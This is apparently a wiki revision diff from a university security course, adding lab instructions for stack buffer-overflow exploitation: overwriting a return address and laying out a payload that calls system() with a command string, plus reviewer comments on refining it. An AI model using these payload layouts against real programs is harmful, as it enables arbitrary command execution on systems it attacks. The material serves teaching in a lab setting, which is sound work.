sesiuni:memory:4 [2013/07/11 17:23]
acopot [Summary]
sesiuni:memory:4 [2013/07/12 15:21] (current)
rcaragea [Hijacking control flow]
Line 123: Line 123:
 </​code>​ </​code>​
  
-* Calling system(char *cmd) 
-     * Because system() takes one argument, you will have to do more than just overwrite the return address, you will need to append to your exploit pattern 4 bytes of '​JUNK'​ and 4 bytes that contain the address of char *cmd 
  
 + * When you want to jump to a function that takes no arguments you only need to append its address to the exploit pattern
 +      <code c>
 +      ...
 +      int f()
 +      {
 +          printf("​Hello\n"​);​
 +          return 42;
 +      }
 +      ...
 +      </​code>​
 + * If the address of the function is 0x0804849c your exploit pattern will look like "​AAAAAA...AAA\x9c\x84\x04\x08"​ because calling this function will look like
 +      <code asm>
 +      ...
 +      call   ​804849c <f>
 +      ...
 +      </​code>​
 +* For tasks randmin_03 and up you will need to call system(char *cmd)
 +      <code c>
 +      ...
 +      int f(char *str)
 +      {
 +          printf("​%s\n",​ str);
 +          return 42;
 +      }
 +      ...
 +      </​code>​
 +*  Translated to asm:
 +      <code asm>
 +      ...
 +      movl   ​$0x80485a0,​(%esp) ​     (0x80485a0 is the address of the string parameter)
 +      call   ​804849c <​f> ​           ​
 +      ...
 +      </​code>​
 +* Because '​call'​ also pushes 4 bytes on the stack the parameter is offset by exactly 4 bytes, so if you want to call f with the address of that string your exploit should look like "​AAAAAA...AAA\x9c\x84\x04\x08ABCD\xa0\x85\x04\x08"​ where ABCD is the 4 byte value mentioned (any value will work)
  
 == Tools you will need == == Tools you will need ==
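Review bot: the bullet "For tasks randmin_03 and up you will need to call system(char *cmd)" is immediately followed by an example built around a local function f(char *str) rather than system(), so say explicitly that f stands in for system here and that the same stack layout (overwritten return address, 4 bytes of padding, then the address of the string) is what you use with the address of system and the address of a string such as a command. The claim "any value will work" for the ABCD padding should also be qualified: those 4 bytes are what the called function sees as its own return address, so once f (or system) returns, execution continues at that value and the process will normally crash unless it is set to something useful such as the address of exit(). Lastly, the parenthetical "(0x80485a0 is the address of the string parameter)" sits inside the <code asm> block next to the movl line, where it renders as if it were part of the disassembly; move it to a comment in assembler syntax or to a sentence below the block.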
Line 134: Line 166:
   * ulimit   * ulimit
   * checksec.sh [[http://​www.trapkit.de/​tools/​checksec.sh]]   * checksec.sh [[http://​www.trapkit.de/​tools/​checksec.sh]]
-  * aslr_brute_helper.py [[http://​swarm.cs.pub.ro/​~rcaragea/​aslr_brute_helper.py]]+  * <​del> ​aslr_brute_helper.py [[http://​swarm.cs.pub.ro/​~rcaragea/​aslr_brute_helper.py]] ​</​del>​
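Review bot: the aslr_brute_helper.py entry is struck through with <del> rather than deleted, so the rendered tools list still shows a crossed-out link to http://swarm.cs.pub.ro/~rcaragea/aslr_brute_helper.py with no explanation; either remove the bullet entirely or add a short note on why the helper is no longer needed for this session, so readers do not go looking for a tool the page has retired.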
sesiuni/memory/4.1373552609.txt.gz · Last modified: 2013/07/11 17:23 by acopot